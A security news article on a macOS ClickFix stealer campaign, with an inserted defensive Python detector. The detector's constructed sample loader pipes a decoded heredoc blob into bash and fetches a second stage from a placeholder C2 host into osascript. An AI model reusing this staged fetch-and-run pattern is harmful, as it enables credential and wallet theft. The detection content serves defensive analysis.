ClickFix Matryoshka Variant Attacks Users with Attacking Deploy

Emy Elsamnoudy
February 16, 2026 2 Min Read

macOS users face a new threat from a sophisticated social engineering campaign. This campaign distributes dangerous stealer malware by leveraging an evolved version of the ClickFix attack technique.

Named “Matryoshka” after the Russian nesting dolls, this variant uses nested obfuscation layers to hide malicious code from security scanners and automated analysis systems.

The attack tricks victims into executing Terminal commands that appear to be legitimate software fixes, bypassing the traditional download-and-launch security expectations that many users rely on.

The campaign leverages typosquatting domains to intercept users who mistype legitimate website addresses, particularly targeting visitors attempting to reach software review sites.

Once redirected to the fraudulent domain, victims encounter a fake installation prompt instructing them to paste a “fix” command into their macOS Terminal application.

Intego analysts identified this attack chain after observing typosquatted domains like comparisions[.]org, which mimics the legitimate comparisons.org website by adding an extra letter.

Unlike earlier ClickFix variants that used readable scripts, Matryoshka employs advanced evasion techniques designed to complicate detection efforts.

The malicious payload remains encoded and compressed until execution, unpacking only in memory rather than writing readable script files to disk.

This approach significantly reduces visibility for file-based security scanning and makes basic static analysis more challenging for researchers.

After successful execution, the loader retrieves an AppleScript payload specifically designed to harvest browser credentials and target cryptocurrency wallet applications including Trezor Suite and Ledger Live.

The malware attempts programmatic credential theft first, then falls back to displaying fake system dialogs that repeatedly request passwords until victims comply.

Infection Mechanism and Evasion Tactics

The Matryoshka infection chain operates through multiple stages, each designed to evade detection while maintaining operational efficiency.

When victims paste the malicious Terminal command, it retrieves a shell script containing a large encoded payload hidden within a heredoc structure.

This payload passes through an in-memory pipeline where it undergoes decoding and decompression without creating easily detectable file artifacts.

The loader demonstrates several evasion behaviors that help it run unnoticed. It detaches its main routine into the background and exits quickly, so the Terminal prompt returns almost immediately and victims believe the process has finished.

The script redirects standard input, output, and error streams to suppress visible artifacts in the terminal session.

Additionally, the command-and-control infrastructure requires specific custom headers in requests, responding with generic errors to automated scanners that do not send those headers.
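The loader traits described above (a heredoc carrying an encoded blob, an in-memory decode/decompress pipe into an interpreter, a second-stage fetch with a custom header, backgrounding, and suppressed standard streams) can be turned into a simple triage heuristic for scripts recovered from Terminal history or a proxy. The following is an added example for defenders, not code from Intego or from the campaign; the sample scripts, the indicator regexes, the threshold and the hostnames are all constructed assumptions.

```python
import re

# Constructed blob standing in for the encoded, compressed payload; the real
# loader carries something far larger inside the heredoc.
BLOB = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoxMjM0NTY3ODkw" * 2

# Constructed sample mirroring the staged structure described in the article:
# heredoc blob, in-memory decode/decompress pipe, second-stage fetch with a
# custom header, backgrounding, and suppressed stdio. Hostnames are placeholders.
LOADER_SCRIPT = (
    "#!/bin/bash\n"
    "main() {\n"
    "  PAYLOAD=$(cat <<'EOF'\n" + BLOB + "\nEOF\n)\n"
    "  echo \"$PAYLOAD\" | base64 -D | gunzip | bash\n"
    "  curl -fsSL -H 'X-Client: PLACEHOLDER' https://c2.example.invalid/s2 | osascript\n"
    "}\n"
    "main >/dev/null 2>&1 </dev/null &\n"
    "exit 0\n"
)

# Ordinary install script with a plain heredoc, used to check for false positives.
BENIGN_SCRIPT = (
    "#!/bin/bash\n"
    "cat <<'EOF'\nInstalling example tool (constructed benign sample)\nEOF\n"
    "make install >/dev/null 2>&1\n"
)

# One regex per indicator. A single hit is weak evidence; the loader's
# signature is the combination, so the verdict uses a hit count.
INDICATORS = {
    "heredoc_blob": re.compile(r"<<-?\s*'?\w+'?\s*\n[A-Za-z0-9+/=]{40,}"),
    "in_memory_decode": re.compile(r"base64\s+(-d|-D|--decode)\s*\|"),
    "in_memory_decompress": re.compile(r"\|\s*(gunzip|gzip\s+-d|xz\s+-d|bunzip2)\b"),
    "pipe_to_interpreter": re.compile(r"\|\s*(bash|sh|zsh|osascript)\b"),
    "custom_header_fetch": re.compile(r"\bcurl\b[^\n]*\s-H\s"),
    "backgrounded": re.compile(r"&\s*$", re.M),
    "stdio_suppressed": re.compile(r">\s*/dev/null\s+2>&1"),
    "stdin_detached": re.compile(r"<\s*/dev/null"),
}

def indicator_hits(script: str) -> list[str]:
    """Return the names of indicators present in the script text."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]

def classify(script: str, threshold: int = 4) -> str:
    """Flag scripts combining enough loader traits; the threshold is an assumed tuning value."""
    hits = indicator_hits(script)
    return "suspicious_clickfix_loader" if len(hits) >= threshold else "no_verdict"
```

Run `classify()` over scripts pulled from shell history, EDR command-line telemetry, or a web proxy; the hit list explains which traits fired so an analyst can tune the threshold against local false positives.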

Users should never paste commands from websites into Terminal, as legitimate software updates will not require this action.

Organizations should block typosquatting domains, monitor Terminal-initiated execution patterns, and watch for suspicious staging archives or wallet application tampering.
